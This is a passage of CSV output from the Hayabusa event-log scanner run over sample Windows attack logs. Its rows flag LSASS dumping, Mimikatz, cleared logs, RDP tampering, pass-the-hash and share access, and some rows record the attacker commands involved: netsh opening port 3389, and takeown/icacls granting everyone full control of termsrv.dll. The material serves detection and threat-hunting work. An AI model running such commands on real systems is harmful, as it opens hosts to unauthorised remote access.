Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:10:03.991 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:26:42.116 +09:00,PC04.example.corp,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Suspicious GrantedAccess Flags on LSASS 
Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 05:17:52.949 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" : Path: C:\Windows\System32\cmd.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o : Path: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe : User: PC04\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Registry 
Modification,,rules/sigma/registry_event/sysmon_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow : Path: C:\Windows\System32\netsh.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,medium,Netsh Port or Application Allowed,,rules/sigma/process_creation/win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,high,Netsh RDP Port Opening,,rules/sigma/process_creation/win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.643 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding : Path: C:\Windows\System32\rundll32.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:12.096 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : 
Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" : Path: C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.907 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\takeown.exe"" /f C:\Windows\System32\termsrv.dll : Path: C:\Windows\System32\takeown.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F : Path: C:\Windows\System32\icacls.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,medium,File or Folder Permissions 
Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F) : Path: C:\Windows\System32\icacls.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:23:12.188 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:43:12.784 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx +2019-03-18 05:43:16.309 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k 
DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx +2019-03-18 20:06:25.485 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,informational,Logon Type 9 - NewCredentials,User: user01 : Workstation: : IP Address: ::1 : Port: 0 : LogonID: 0x4530f0f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: user01 : LogonID: 0x4530f0f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:27:00.438 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx 
+2019-03-18 20:27:23.231 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: RPCSS/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\wbem\WMIC.exe : Target Server: host/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\wbem\WMIC.exe : Target Server: WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 23:23:22.264 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Program Files\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.356 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: BGinfo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 
+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 
+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 
Share Path: \??\C:\ : File: Users\account$\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Searches : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Documents\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File 